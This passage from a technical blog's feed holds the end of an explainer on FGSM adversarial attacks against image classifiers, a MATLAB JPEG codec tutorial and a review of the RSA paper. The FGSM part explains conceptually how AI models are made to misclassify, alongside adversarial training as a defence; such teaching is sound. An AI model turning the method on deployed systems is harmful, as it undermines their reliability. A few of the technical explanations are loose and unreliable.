other targets, like a gibbon, as a result.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://www.aspires.cc/content/images/2024/05/adversarial_img_1.png" class="kg-image" alt="Gradient Attack: A Brief Explanation on Adversarial Attack" loading="lazy" width="470" height="178"><figcaption><span style="white-space: pre-wrap;">Generating Adversarial Perturbation</span></figcaption></figure><h1 id="types-of-adversarial-attacks">Types of Adversarial Attacks</h1><p>From the perspective of result achieving, adversarial attacks can be classified into two categories &#x2014; targeted attacks and untargeted attacks. The targeted attack aims to make the model misclassify a specific class to another given class (target class). On the other hand, the untargeted attack does not have a target class; the goal is simply to make the target model misclassify that specific class.</p><p>From the perspective of the right of accessing model parameters, there are white box and black box attacks. A white box attack is one where everything about the deployed model is known, such as inputs, model structure, and specific model internals like weights or coefficient values. In most cases, this means explicitly that the developers have the right to access the internal gradient values of the model. Some researchers also include knowing the entire training data set in white box attacks. Conversely, a black box attack is one where they only know the model inputs and query for output labels or confidence scores.</p><h2 id="fgsm-adversarial-attack">FGSM Adversarial Attack</h2><p>One of the most popular methods is the Fast Gradient Sign Method (FGSM) introduced by Ian Goodfellow et al. to create adversarial examples. The paper showed that the FGSM attacks could result in 89.4% misidentification (97.6% confidence) on the original model.</p><p>The method of FGSM aims to alternate the input of a deep learning model to a maximum loss using the gradients from backpropagation. Assume that a neural network with intrinsic parameters (weights and biases of each neuron) and the loss function of that neural network is. FGSM algorithm calculates the partial deviation of the loss function to get the direction (sign) to maximum loss increment and add the direction multiplied by the variable (usually a tiny floating number) to each input. Equation 1 describes the mathematical representation of this procedure.</p><p>$$x_{adv} = x + \epsilon \times sign(\nabla_xJ(\theta, X, Y))$$</p><h1 id="linear-explanation-of-adversarial-examples">Linear Explanation of Adversarial Examples</h1><p>Commonly, digital images often use 8 bits per pixel for storing the data, so all information below the atomic size is discarded. Because the precision of the features is limited, the classifier could not give a disparate classification under two input $x$ and $\widetilde{x} = x + \eta$ if every element of the perturbation $\eta$ is smaller than the atomic size. As long as $\max(\eta) &lt; \epsilon$ where $\epsilon$ is small enough to be discarded by the classifier, we expect the classifier to assign the same class to $x$ and $\hat{x}$. Hence the dot product between $w$ and $x$, $\widetilde{x}$</p><p>$$w^\top\widetilde{x} = w^\top x+w^\top \eta$$</p><p>If $w$ has $n$ dimensions and the average magnitude of an element of the weight vector is $m$, by assigning $\eta = \text{sign}(w)$ where $\text{sign}(x) = +1$ for all $x&gt;0$ and  $\text{sign}(x) = -1$ for all $x&lt;0$, then the weighted input $w^\top \widetilde{x}$ will grow by $\epsilon m n$. For high dimensional problems, if we make many infinitesimal changes to the $x$ that adds up to one significant change to the output.</p><h1 id="adversarial-training">Adversarial Training</h1><p>Since adversarial examples $\widetilde{x}$ are generated by the input data and the model parameters to make a misclassification to the classifier. However, it is intuitively that if we label the $\widetilde{x}$ to its original class and retrain the model on those examples and their correct labels, this fine-tuning approach by numerous adversarial examples will make the model more robust against adversarial attacks.</p><p>In 2019, Tasnim et al. <sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup> proposed a data augmentation approach by introducing InvFGSM adversarial learning attack techniques for medical image segmentation, which achieved higher accuracy and robustness<br>
In 2022, Xie et al. <sup class="footnote-ref"><a href="#fn2" id="fnref2">[2]</a></sup> introduced AdvProp (Adversarial Propagation) to improve the recognition accuracy of original data using separate batches for original data and adversarial examples generated by PGD attacks. Their framework achieved 85.2% classification accuracy in ImageNet using adversarial training technique and has a 0.7% growth higher than vanilla training.</p>
<p>According to the literature, adversarial training is a plausible way of enhancing the robustness of a model and a possible way to increase model performance, such as accuracy and AUC, which needs further research and experiments.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p><a href="https://arxiv.org/abs/2105.12106?ref=aspires.cc">https://arxiv.org/abs/2105.12106</a> <a href="#fnref1" class="footnote-backref">&#x21A9;&#xFE0E;</a></p>
</li>
<li id="fn2" class="footnote-item"><p><a href="https://arxiv.org/abs/1911.09665?ref=aspires.cc">https://arxiv.org/abs/1911.09665</a> <a href="#fnref2" class="footnote-backref">&#x21A9;&#xFE0E;</a></p>
</li>
</ol>
</section>
<p></p>]]></content:encoded></item><item><title><![CDATA[Implementing JPEG Image Compression Algorithm using MATLAB]]></title><description><![CDATA[In this tutorial, we will implement a image compression algorithm using MATLAB. JPEG stands for Joint Photographic Experts Group, which was a group of image processing experts that devised a standard for compressing images (ISO).]]></description><link>https://www.aspires.cc/implementing-jpeg-image-compression-algorithm-using-matlab/</link><guid isPermaLink="false">664a7832da27ac0001efd70a</guid><category><![CDATA[Algorithms]]></category><dc:creator><![CDATA[Ex10si0n Yan]]></dc:creator><pubDate>Mon, 14 Nov 2022 00:00:00 GMT</pubDate><media:content url="https://www.aspires.cc/content/images/2024/05/jpeg.png" medium="image"/><content:encoded><![CDATA[<img src="https://www.aspires.cc/content/images/2024/05/jpeg.png" alt="Implementing JPEG Image Compression Algorithm using MATLAB"><p>The JPEG (or JPG) format is not technically a file format, but rather an image compression standard. The JPEG standard is complex, with various options and color space regulations. However, it was not widely adopted. Simultaneously, a simpler version called JFIF was advocated. This is the image compression algorithm commonly referred to as JPEG compression, and the one we will be discussing in this class. It&apos;s worth noting that the file extensions .jpeg and .jpg have persisted, even though the underlying algorithm strictly follows JFIF compression.</p><h1 id="the-underlying-assumptions-of-the-jpeg-algorithm"><strong>The Underlying Assumptions of the JPEG Algorithm</strong></h1><p>The JPEG algorithm is designed specifically for the human eye. It exploits the following biological properties of human sight:</p><ol><li> We are more sensitive to the illuminocity of color, rather than the chromatric value of an image</li><li>We are not particularly sensitive to high-frequency content in images.</li></ol><p>The algorithm can be neatly illustrated in the following diagram: </p><figure class="kg-card kg-image-card"><img src="https://www.aspires.cc/content/images/2024/05/main-qimg-8ea0e209b8e91adf05c404162e517b96.webp" class="kg-image" alt="Implementing JPEG Image Compression Algorithm using MATLAB" loading="lazy" width="380" height="252"></figure><h1 id="matlab-implementation-encoder">Matlab Implementation: Encoder</h1><p>Assume <code>img</code> is the image we have read in. In JPEG compression, all compression processes should be carried on in YCbCr color space. In this color space, <strong>Cb is the blue component relative to the green component while Cr is the red component relative to the green component.</strong></p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://medium.com/breaktheloop/what-is-ycbcr-964fde85eeb3?ref=aspires.cc"><div class="kg-bookmark-content"><div class="kg-bookmark-title">What is YCbCr ? (Color Spaces)</div><div class="kg-bookmark-description">YCbCr is a color space. that means YCbCr is another colour space just like RGB. I&#x2019;ll explain bot more in the following sections</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://cdn-static-1.medium.com/_/fp/icons/Medium-Avatar-500x500.svg" alt="Implementing JPEG Image Compression Algorithm using MATLAB"><span class="kg-bookmark-author">Break the Loop</span><span class="kg-bookmark-publisher">Danoja Dias</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://miro.medium.com/max/400/1*fnccpTrc9dBQkLEdPzvO5g.jpeg" alt="Implementing JPEG Image Compression Algorithm using MATLAB"></div></a></figure><p>Here is the built-in Matlab code for converting the color space. </p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/e4191cb3dfcd393364ba94e11d518f19.js"></script>
<!--kg-card-end: html-->
<p>The YCbCr is a more convenient colorspace for image compression because it separates an image&apos;s illuminance and chromatic strength. Since our eyes are not particularly sensitive to chrominance, we can &quot;downsample&quot; that. Here, half the amount of &quot;color&quot; and generate the <code>Y_dsp</code> representing downsampled <code>Y</code>. The difference between original and downsampled image is imperceptible, as you can see from the result.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://www.aspires.cc/content/images/2024/05/cornell-jpeg.png" class="kg-image" alt="Implementing JPEG Image Compression Algorithm using MATLAB" loading="lazy" width="728" height="514" srcset="https://www.aspires.cc/content/images/size/w600/2024/05/cornell-jpeg.png 600w, https://www.aspires.cc/content/images/2024/05/cornell-jpeg.png 728w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Downsampling, Image from </span><a href="http://pi.math.cornell.edu/~web6140/TopTenAlgorithms/JPEG.html?ref=aspires.cc"><span style="white-space: pre-wrap;">pi.math.cornell.edu</span></a></figcaption></figure>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/7182496e4b911fabc444057160c0dbfe.js"></script>
<!--kg-card-end: html-->
<p>Following the steps, we need to apply the following processes for each 8x8 blocks in the image. <code>Y_dct</code> is the matrix contains frequency domain of original image specifically for every 8x8 block. In another word, we apply discrete cosine transform (DCT) for every 8x8 block and store these 8x8 results matrices into <code>Y_dct</code>.</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/0c50ce86c1f0c51f6d2a9ba343eec40a.js"></script>
<!--kg-card-end: html-->
<p>Then we apply DCT inside the preceding tripe for loop, this process transform the original image from spatial domain to frequency domain:</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/84c4a47beeb5536b85f72c3143795305.js"></script>
<!--kg-card-end: html-->
<p>Quantization is a process in which we take a couple of values in a specific range and turns them into a discrete value. (also called discretization). It is intuitive that after DCT, quantization converts the higher frequency coefficients in the output matrix to 0. </p><p>Besides, the intensity of quantization determines the extend of data retaining for the image. Quantization is applied and how much of higher frequency information is lost, and this is the reason why JPEG is a lossy compression.</p><p>Since we have got the matrix in frequency domain, we could apply quantization using a quantization table <code>Q</code>. </p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/20f35e7f2c331a70f2be1da0d48d7108.js"></script>
<!--kg-card-end: html-->
<p>After quantization, the image has been compressed a lot, however; in order to have a extreme compression, we should consider the potential of compressing the quantized data using entropy coding (i.e. Huffman Coding).</p><p>However, since <code>Y_dct</code> now is a 2D matrix, we need to convert it to 1D firstly. Yet, there is many ways of converting 2D array to 1D. Due to the characteristic of &quot;DCTed&quot; array - large numbers always lies on top-left, zig-zag is a better choice.</p><p>To implement zig-zag, we could declare a zig-zag table as follows. </p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/972c82680895e07dadb4f157b3627fe1.js"></script>
<!--kg-card-end: html-->
<p>This table is designed by the process of zig-zagging, which is illustrated in the following diagram. Zig-zag ensures top-left first, then positive (non-negative) numbers in the generated 1D array should be lies on the staring points.</p><figure class="kg-card kg-image-card"><img src="https://www.aspires.cc/content/images/2024/05/1007.jpg" class="kg-image" alt="Implementing JPEG Image Compression Algorithm using MATLAB" loading="lazy" width="952" height="473" srcset="https://www.aspires.cc/content/images/size/w600/2024/05/1007.jpg 600w, https://www.aspires.cc/content/images/2024/05/1007.jpg 952w" sizes="(min-width: 720px) 720px"></figure><p>Here is the code for zig-zagging.</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/4fac71f28c9d6bad1d730eeafb8b4d89.js"></script>
<!--kg-card-end: html-->
<p>Till now, we have turned the 2D <code>Y_dct</code> into <code>Y_lin</code> which represents linear 1D array. To better handling this 1D array, DC and AC are two essential part to be implemented.</p><p>DC is the different first digit of <code>Y_lin</code> between the preceding first digit for every adjacent 8x8 blocks. AC is the rest of digits (2, 64) in <code>Y_lin</code> for the current 8x8 block.</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/47c72070cd7d41561eb90df3908a8c92.js"></script>
<!--kg-card-end: html-->
<p>AC should be applied with Run Length Encoding (RLE) if you are not familiar with this, please refer: <a href="https://filestore.aqa.org.uk/resources/computing/AQA-8525-TG-RLE.PDF?ref=aspires.cc">filestore.aqa.org.uk(PDF)</a>. The code below is RLE codec.</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/9f5de23f5aefa2c79b3f0a5e0db87a41.js"></script>
<!--kg-card-end: html-->
<p>Hence, we could apply RLE to AC, and append BC, AC to a data payload.</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/83ee6d68f1ec5c384e761e3faf849bd8.js"></script>
<!--kg-card-end: html-->
<p>Huffman encoding is a pretty concise and elaborate entropy encoding yields optimal prefix code that is commonly used for lossless data compression. Code for a simple implementation of Huffman encoding in Python could be found at:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/Ex10si0n/hzip?ref=aspires.cc"><div class="kg-bookmark-content"><div class="kg-bookmark-title">GitHub - Ex10si0n/hzip: a cli tool for zip files written in python</div><div class="kg-bookmark-description">a cli tool for zip files written in python. Contribute to Ex10si0n/hzip development by creating an account on GitHub.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt="Implementing JPEG Image Compression Algorithm using MATLAB"><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">Ex10si0n</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/8f773a0456ca756c87d59b19d52fbc8bec0bdf7e87456752ba74b62865886e74/Ex10si0n/hzip" alt="Implementing JPEG Image Compression Algorithm using MATLAB"></div></a></figure><p>Then we could apply built-in Huffman encoding to all payloads all at onces.</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/2e0a3bdbaaf067355ee65ad3622734d4.js"></script>
<!--kg-card-end: html-->
<p>Then we could store <code>dict</code> into header and <code>bit_stream</code> as compressed image data, they encapsulate them to a single file. That&apos;s it, we have implemented a JPEG encoder (Image to bitstream) now. </p><h1 id="matlab-implementation-bit-stream">Matlab Implementation: Bit stream</h1><p>In the generated data (say bit stream), it should store some information inside its header, such as, dictionary <code>header_dict</code> used for huffman encoding. Moreover, since AC was applied through RLE, and then we encapsulate it with DC inside a payload. There should be a header for maintaining how long for each payload, in this implementation, we uses <code>header_ac_seperator</code> to store this information. Besides, resolution of orginial image should also be stored because without it we cannot specify the image row-column ratio when rebuilding it, that make sense. Finally, quality coeffeicient should also be stored in the header since it is determined only when encoding.</p><h1 id="matlab-implementation-decoder">Matlab Implementation: Decoder</h1><p>Inversely, to employ JPEG decoder, just inverse these processes. Firstly, after receiving content for bit stream, we apply huffman decoding to it</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/f15cce67fa8c97d69b42c9608d411406.js"></script>
<!--kg-card-end: html-->
<p>Then, refering <code>header_ac_seperator</code>, we could re-constructuct each payload <code>[DC AC]</code> which we have mentioned previously. </p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/dbf26560fb75455c1f0592fa6558429e.js"></script>
<!--kg-card-end: html-->
<p>Then, we applied inverse zig-zag using the same zig-zagging sequence, inverse quatization, and inverse DCT.</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/c40f0f9a0c83d98186ede0765dab5ef3.js"></script>
<!--kg-card-end: html-->
<p>We can rebuild each block in the image.</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/c382eb11b2929e8641646c7f41ac4ee5.js"></script>
<!--kg-card-end: html-->
<p>To make the iteration works, some iteration variables should be changed during the loop</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/716659fead2d2628a4ee5a6d09410020.js"></script>
<!--kg-card-end: html-->
<p>Finally, we change the color space from YCbCr to RGB</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/52e0349ce2c34f62df249c6d912bad02.js"></script>
<!--kg-card-end: html-->
<p>Run it and have a look.</p><figure class="kg-card kg-image-card"><img src="https://www.aspires.cc/content/images/2024/05/matlab-jpeg-ide.png" class="kg-image" alt="Implementing JPEG Image Compression Algorithm using MATLAB" loading="lazy" width="2000" height="1187" srcset="https://www.aspires.cc/content/images/size/w600/2024/05/matlab-jpeg-ide.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/05/matlab-jpeg-ide.png 1000w, https://www.aspires.cc/content/images/size/w1600/2024/05/matlab-jpeg-ide.png 1600w, https://www.aspires.cc/content/images/2024/05/matlab-jpeg-ide.png 2000w" sizes="(min-width: 720px) 720px"></figure><p>We can see the image compression ratio in comparing original headless image data vs. compressed header and content:</p><pre><code class="language-sh">   Compression coefficient: 1.1800
Before compression (bytes): 480000
 After compression (bvtes): 304188
         Compression ratio: 1.5780
           PSNR value (dB): 65.829</code></pre><p>Bingo! We have achieved a JPEG decoder now by inversely designing the encoder. Take a look at the decoded compressed image.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://www.aspires.cc/content/images/2024/05/before-jpeg.png" class="kg-image" alt="Implementing JPEG Image Compression Algorithm using MATLAB" loading="lazy" width="400" height="400"><figcaption><span style="white-space: pre-wrap;">Before Compression</span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://www.aspires.cc/content/images/2024/05/jpeg-after.png" class="kg-image" alt="Implementing JPEG Image Compression Algorithm using MATLAB" loading="lazy" width="400" height="400"><figcaption><span style="white-space: pre-wrap;">After Compression</span></figcaption></figure><p>We can see that in the compressed image, pixels on the edges of the guy is quite weird, it is because the mini-block-wise DCT sampling have different rounded value. To compared with the original image, the image different could be calculated by setting threshold as 3.</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/76dab0e68ef520ff381b3f242108ae61.js"></script>
<!--kg-card-end: html-->
<p>Now we have visualized the different between original and compressed image.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://www.aspires.cc/content/images/2024/05/jpeg-diff.png" class="kg-image" alt="Implementing JPEG Image Compression Algorithm using MATLAB" loading="lazy" width="400" height="400"><figcaption><span style="white-space: pre-wrap;">Image Diff</span></figcaption></figure><h1 id="conclusion">Conclusion</h1><p>We have implemented a JPEG codec in this tutorial, now you have learned:</p><ul><li>YCbCr color space</li><li>Discrete Cosine Transform and Inverse Discrete Cosine Transform (to be added)</li><li>JPEG encoding process (image to blocks - DCT - quantization - zigzagging - entropy encoding - encapsulation)</li><li>JPEG decoding process (decapsulation - entropy decoding - inverse zigzagging - inverse quantization - iDCT - blocks to image)</li><li>Some of the JPEG headers</li></ul><p>You can find the code at my Github via the following link:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/Ex10si0n/jpeg-codec?ref=aspires.cc"><div class="kg-bookmark-content"><div class="kg-bookmark-title">GitHub - Ex10si0n/jpeg-codec: MATLAB implementation of a simple JPEG codec</div><div class="kg-bookmark-description">MATLAB implementation of a simple JPEG codec. Contribute to Ex10si0n/jpeg-codec development by creating an account on GitHub.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt="Implementing JPEG Image Compression Algorithm using MATLAB"><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">Ex10si0n</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/a4fd8196c41ffe9bcb3104ab70781b84a5d5599389fd4008c8eb77a3a0641b17/Ex10si0n/jpeg-codec" alt="Implementing JPEG Image Compression Algorithm using MATLAB"></div></a></figure><h1 id="further-reading">Further Reading</h1><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://yasoob.me/posts/understanding-and-writing-jpeg-decoder-in-python/?ref=aspires.cc"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Understanding and Decoding a JPEG Image using Python - Yasoob Khalid</div><div class="kg-bookmark-description">Hi everyone! &#x1F44B; Today we are going to understand the JPEG compression algorithm. One thing a lot of people don&#x2019;t know is that JPEG is not a format but rather an algorithm. The JPEG images you see are mostly in the JFIF format (JPEG File Interchange Format) that internally uses the JPEG compression a&#x2026;</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://yasoob.me/images/logo.png" alt="Implementing JPEG Image Compression Algorithm using MATLAB"><span class="kg-bookmark-author">website logo</span><span class="kg-bookmark-publisher">Muhammad Yasoob Ullah Khalid</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://yasoob.me/images/decoding_jpeg/hero-image.png" alt="Implementing JPEG Image Compression Algorithm using MATLAB"></div></a></figure>]]></content:encoded></item><item><title><![CDATA[RSA Digital Signatures and Public-Key Cryptosystems]]></title><description><![CDATA[This post is a paper review on the RSA algorithm proposed by R.L. Rivest, A.Shamir, and L.Adleman. Their proposed algorithm has a wide application in public-key cryptography in network security of maintaining secure data communication.]]></description><link>https://www.aspires.cc/rsa/</link><guid isPermaLink="false">664a7ed1da27ac0001efd776</guid><category><![CDATA[Security]]></category><category><![CDATA[Algorithms]]></category><dc:creator><![CDATA[Ex10si0n Yan]]></dc:creator><pubDate>Sat, 12 Nov 2022 00:00:00 GMT</pubDate><content:encoded><![CDATA[<p>This post is a paper review on the RSA algorithm proposed by R.L. Rivest, A.Shamir, and L.Adleman. Their proposed algorithm has a wide application in public-key cryptography in network security of maintaining secure data communication.</p><p>All classical encryption methods (including the NBS standard by IBM) suffer from the &quot;key distribution problem.&quot; The problem is that before a private communication can begin, <strong>another</strong> private transaction is necessary to distribute corresponding encryption and decryption keys to the sender and receiver, respectively. Typically a private courier is used to carry a key from the sender to the receiver. Such a practice is not feasible if an electronic mail system is to be rapid and inexpensive. Instead, a public-key cryptosystem needs no private couriers; there should be an algorithm to distribute their secret keys to the sender and receiver over the insecure communications channel.</p><h1 id="public-key-cryptosystems">Public Key Cryptosystems</h1><p>RSA is an implementation of a &quot;public-key cryptosystem&quot;. The concept of &quot;public-key cryptosystem&quot; was invented by Diffie and Hellman&apos;s work [1]. The cryptosystem should meet these properties:</p><pre><code>(a) D(E(M)) = M
(b) D and E should be in low time complexity
(c) The process is efficient iff E for encrypt and D for decrypt
(d) E(D(M)) = M
</code></pre><p>A function $E$ compliance (a), (b), and (c) is a &quot;trap-door one-way function&quot;, additionally; if it also satisfies (d), then it is a &quot;trap-door one-way permutation&quot;. The two concepts of &quot;trap-door one-way&quot; are introduced in [1]. In the reviewed paper, the author explained that a function is &quot;one-way&quot; since it is easy to compute in one direction but very difficult to compute in the reversed direction. The function is called &quot;trap-door&quot; since its inverse is easy to compute once certain private &quot;trap-door&quot; information is known.</p><p>Assume Alice has a secret decryption function $D_A$ and a public encryption function $E_A$ which could be called by anyone. Similarly, Bob has private $D_B$ and a public $E_B$. If Bob wants to send a private message to Alice in a public-key cryptosystem, he should first retrieve $E_A$ from the public. Then he sends Alice the encrypted message $E_A(M)$. On Alice&apos;s side, she deciphers the message sent from Bob by calculating $D_A(E_A(M)) = M$. According to the property: the process is efficient iff E for encrypt and D for decrypt, which means only Alice can decipher $E_A(M)$. This process maintains private communication between Alice and Bob without private transactions (symmetric ciphered transaction).</p><h1 id="signatures">Signatures</h1><p>In the previous example, Bob could guarantee the message could only be seen by Alice since Bob uses $E_A$ to encrypt the message. However, from Alice&apos;s perspective, she could not guarantee that the message was from the real Bob.</p><p>To implement signatures, the public-key cryptosystem must be implemented with trap-door one-way permutations (decrypted message could be encrypted with $E$) since the decryption algorithm will be applied to unenciphered messages. Bob can prove himself as real by computing his &quot;signature&quot;:</p><p>$$S=D_B(M)$$</p><p>Note that any message could be deciphered, no matter whether it is a ciphered text or not. He then encrypts $S$ using $E_A$ (for security) and sends the result $E_A(S)$ to Alice.  $M$ is not needed to be sent due to:</p><p>$$M=E_B(S)$$  (where $E_B$ is public)</p><p>A message-signature pair $(M, S)$ is made, and Bob cannot deny it since he used his $D_B$ to generate $S$, moreover; $M$ cannot be modified by Alice since she would have to create the corresponding signature $S$.</p><p>Therefore, the message-signature pair provide proof of Alice and Bob mutually.</p><h1 id="rsa-overview">RSA Overview</h1><p>RSA applies the encryption process by using a public encryption key $(e, n)$ where $e, n \in +\mathbb{Z}$.  the message $M$ should less than $n$. Then encrypt the message by the following formula and get $C$ as the ciphertext.</p><p>$$C=M^e\mod n$$</p><p>The ciphertext $C$ could be decrypted by raising it to power $d$ and modulo $n$, the following formula describes this process.</p><p>$$M=C^d \mod n$$</p><p>Hence, the encryption key is $(e, n)$, and the decryption key is $(d, n)$. And users make their encryption key public and keep the corresponding decryption key secret.</p><h1 id="rsa-algorithm">RSA Algorithm</h1><p>In the previous section - RSA Overview, $e$ and $d$ need to be calculated as a pair. The way of choosing appropriate $e$ and $d$ is illustrated as follows. Randomly choose two large primes $p$ and $q$, and calculate the $n$ by the following formula, just guarantee that $n$ is larger than the message to be encrypted.</p><p>$$n=p\cdot q$$</p><p>Then find a $d$ which is relatively prime to $(p-1)\cdot(q-1)$.</p><p>$$\gcd[d, (p-1)\cdot(q-1)] = 1$$</p><p>And find the corresponding $e$ by calculating modulo inverse.</p><p>$$(e\cdot d) \equiv 1 \quad (\text{mod} (p-1)\cdot(q-1))$$</p><p>The preceding calculation: the greatest common divisor, could be calculated using Euclidean Algorithm in $\mathcal{O}(\log(N))$ time complexity. As for the inverse modulo, since we have known $d$ and $(p-1)\cdot(q-1)$, $e$ could be solved by applying Extend Euclidean Algorithm in $\mathcal{O}(\log(\min(d, (p-1)\cdot(q-1))))$ time complexity.</p><p>Until now, the key calculations are finished, and we can get $(e,n)$ and $(d,n)$ which are the encryption key (public) and decryption key (private).</p><h1 id="how-rsa-works">How RSA works?</h1><p>According to the Euler totient function [2], which returns a number of positive integers less than $n$ which are relatively prime to $n$. For example, $p$ is a prime, then</p><p>$$\phi(p)=p-1$$</p><p>Since the algorithm calculates $n=p\cdot q$. By elementary properties</p><p>$$\phi(n) = \phi(p) \cdot \phi(q) = (p-1)\cdot(q-1)$$</p><p>Since $d$ is relatively prime to $\phi(n)$ because of $\gcd[d, (p-1)\cdot(q-1)] = 1$, it has a multiplicative modulo inverse $e$ in the ring of integers modulo $\phi(n)$.</p><p>$$(e\cdot d) \equiv 1 \quad (\text{mod}\phi(n))$$</p><p>By the functionality of encryption and decryption</p><p>$$D(E(M)) \equiv (E(M))^d \equiv (M^e) ^d (\text{mod} n) = M^{e \cdot d} (\text{mod} n)$$ (encryption and decryption)</p><p>$$E(D(M)) \equiv (D(M))^e \equiv (M^d) ^e (\text{mod} n) = M^{e \cdot d}  (\text{mod} n)$$ (signaturing)</p><p>and</p><p>$$M^{e \cdot d} \equiv M^{k \cdot \phi(n) + 1} (\text{mod} n)$$ (multiplicative modulo inverse)</p><p>by Euler and Fermat: for any integer $M$ which is relatively prime to $n$</p><p>$$M^{\phi(n)} \equiv 1 (\text{mod} n)$$</p><p>for all $M$ such that $p$ does not divide $M$</p><p>$$M^{p-1} \equiv 1 (\text{mod}p)$$</p><p>and since $(p-1)$ divides $\phi(n)$.</p><p>$$M^{k \cdot \phi(n) + 1} \equiv M (\text{mod}p)$$</p><p>Similarly, $(q-1)$ divides $\phi(n)$,</p><p>$$M^{k \cdot \phi(n) + 1} \equiv M (\text{mod}q)$$</p><p>Hence, for all $M$</p><p>$$M^{e \cdot d} \equiv M^{k \cdot \phi(n) + 1} \equiv M (\text{mod} n)$$</p><p>Then we proved that $M$ could reveal by decrypting using $(d, n)$.</p><h1 id="rsa-reliability">RSA Reliability</h1><p>All the mathematical variables used in the algorithm are $p, q, n, e, d, \phi(n)$. According to the process, only $(e, n)$ is public, and $p, q, d,\phi(n)$ is private, where $d$ is a component of the private key and should be kept secret.</p><p>To prove the reliability of RSA, we should figure out if there is an approach to determine $d$ by having only $n$ and $e$. Regarding the algorithm, we have</p><p>$$(e\cdot d) \equiv 1 \quad (\text{mod};\phi(n))$$</p><p>(means we need to determine $\phi(n)$ to calculate $d$, since we already know $e$)</p><p>$$\phi(n) = (p-1)(q-1)$$</p><p>(means we have to figure out $p$ and $q$, the randomly selected large prime)</p><p>$$n = p\cdot q$$</p><p>(means that the only way to get $p$ and $q$ is by factoring the large integer $n$)</p><p>Hence, the difficulty of factorizing a very large integer determines the reliability of the RSA algorithm. In other words, the more difficult it is to factorize a very large integer, the more reliable the RSA algorithm is.</p><p>In the paper, the author mentioned the fastest factoring algorithms, in which factoring a number seems to be much more difficult than determining whether it is prime or composite.</p><h1 id="conclusion">Conclusion</h1><p>RSA is an implementation of public-key cryptography put forward by R.L. Rivest, A.Shamir, and L.Adleman in 1977, and it has a broad application nowadays. RSA is a relatively slow algorithm. Hence, it is not usually used to encrypt user data directly. Instead, it could establish a private session between two terminals by transmitting shared session keys for symmetric-key cryptography, which are then used for maintaining encryption&#x2013;decryption.</p><h1 id="references">References</h1><p><strong>Original Paper</strong>: Rivest, R. L., Shamir, A., &amp; Adleman, L. (1983). A method for obtaining digital signatures and public-key cryptosystems. <em>Communications of the ACM</em>, <em>26</em>(1), 96&#x2013;99. <a href="https://doi.org/10.1145/357980.358017?ref=aspires.cc">https://doi.org/10.1145/357980.358017</a></p><ol><li>Diffie, W., &amp; Hellman, M. (1976). New directions in cryptography. <em>IEEE Transactions on Information Theory</em>, <em>22</em>(6), 644&#x2013;654. <a href="https://doi.org/10.1109/tit.1976.1055638?ref=aspires.cc">https://doi.org/10.1109/tit.1976.1055638</a></li><li>Niven, I., and Zuckerman, H.S. An Introduction to the Theory of Numbers. Wiley, New York, 1972.</li></ol>]]></content:encoded></item></channel></rss>